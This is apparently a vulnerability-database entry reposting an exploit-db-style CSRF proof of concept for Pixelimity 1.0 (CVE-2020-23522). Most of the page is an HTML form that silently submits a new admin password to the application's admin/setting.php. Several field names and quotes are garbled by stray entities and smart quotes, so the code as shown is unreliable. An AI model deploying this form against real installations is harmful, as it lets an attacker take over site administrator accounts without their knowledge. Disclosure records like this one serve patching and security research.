Loading
0

CVE-2020-23522 Pixelimity 1.0 跨站请求伪造漏洞

免费、自由、人人可编辑的漏洞库

,

# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery
# Date: 2020-06-03
# Exploit Author: Noth
# Vendor Homepage: https://github.com/pixelimity/pixelimity
# Software Link: https://github.com/pixelimity/pixelimity
# Version: v1.0
# CVE : 2020-23522

Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data Password parameter.

PoC :

<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“http://127.0.0.1/pixelimity-dev/admin/setting.php
” method=“POST”>
<input type=“hidden” name=“submit_setting” value=“Save Setting”/>
<input type=“hidden” name=“dataadmin_portfolio_show”
value=“5”/>
<input type=“hidden” name=“dataadmin_pages_show”
value=“5”/>
<input type=“hidden” name=“admindata_password”
value=“456789”/>
<input type=“hidden” name=“datasite#95;name"
value=“Pixelimity”/>
<input type=“hidden” name=“datasite_nameshow”
value=“My Online Portfolio”/>
<input type=“hidden” name=“datahome_image_size&#93” value=“5”/>
<input type=“hidden” name=“ datasingle_image_image_size#93
” value=“ 240&44;0,0&44;auto ”/>
<input type=“hidden” name=“datasingle_image_image_size#93”
value=“720&44;0,0&44;auto”/>
<input type=“submit” value=“Submit request”/>
</form>
</body>
</html>

PWNWIK.COM